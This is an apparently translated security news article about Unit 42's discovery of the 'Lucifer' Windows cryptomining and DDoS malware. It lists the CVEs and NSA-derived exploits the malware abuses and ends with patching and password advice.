Security researchers have discovered a new type of malware that hijacks vulnerable Windows devices to mine cryptocurrency and launch devastating DDoS attacks.

The malware, dubbed "Lucifer" by its discoverers at cybersecurity firm Palo Alto Networks' Unit 42, tries common usernames and passwords at widely used system ports to "brute to infiltrate the system.

This malware primarily targets corporate servers and can also infect personal computers, especially since servers can penetrate corporate networks.

Unit 42 encountered this malware after investigating the CVE-2019-9081 exploit, a vulnerability in the open source web application development Laravel Framework.

"Upon closer examination of this malware, which we named "Lucifer," we found that it is capable of DDoS attacks and has all kinds of exploits against vulnerable Windows hosts," Unit 42 researchers wrote in a blog post.

(Lucifer's own creator calls this malware "Satan DDoS," but Unit 42 thought that might cause confusion since there is already a "Satan" ransomware).

"The first wave of the campaign stopped on June 10, 2020. The attackers then resumed the campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc.

Researchers have described Lucifer as having "quite powerful capabilities." Once a system is infected, the perpetrator mines the Monero cryptocurrency and spreads it to other machines on the local network using the EternalBlue, EternalRomance, and DoublePulsar exploits stolen from the US National Security Agency several years ago.

According to researchers, hackers use the Lucifer malware to "weaponize" various security vulnerabilities.

These vulnerabilities, identified by Common Vulnerabilities and Exposures (CVE) ID numbers, include CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, ThinkPHP RCE vulnerability ( CVE-2018-20062), CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464.

"These vulnerabilities are rated High or Critical because their exploitation is trivial and their impact on victims is enormous," the researchers explained. [Once exploited, an attacker can execute arbitrary commands on a vulnerable device. In this case, the target is Windows hosts on both the Internet and intranets, as the attacker leverages the certutil utility in the payload for malware propagation.

Certutil.exe is a Microsoft utility that manages digital certificates required for secure Internet communication and transactions.

While these vulnerabilities are certainly worrisome, the researchers noted that patches are "readily available" and urged organizations to keep their systems updated to mitigate the attack. [While the vulnerabilities exploited by this malware and the modus operandi of the attack are not novel, they are a reminder that it is critical to keep systems as up-to-date as possible, eliminate weak credentials, and have a layer of defense for assurance. [Whether it is a laptop or a web server, to ensure that your Windows system is not hit by the Lucifer malware, make sure it is fully patched with the latest Windows security updates and that the system administrator's user name and password are strong and unique That's it.

Of course, using the best anti-virus software also helps, most of which immediately recognize and block Lucifer and its various components.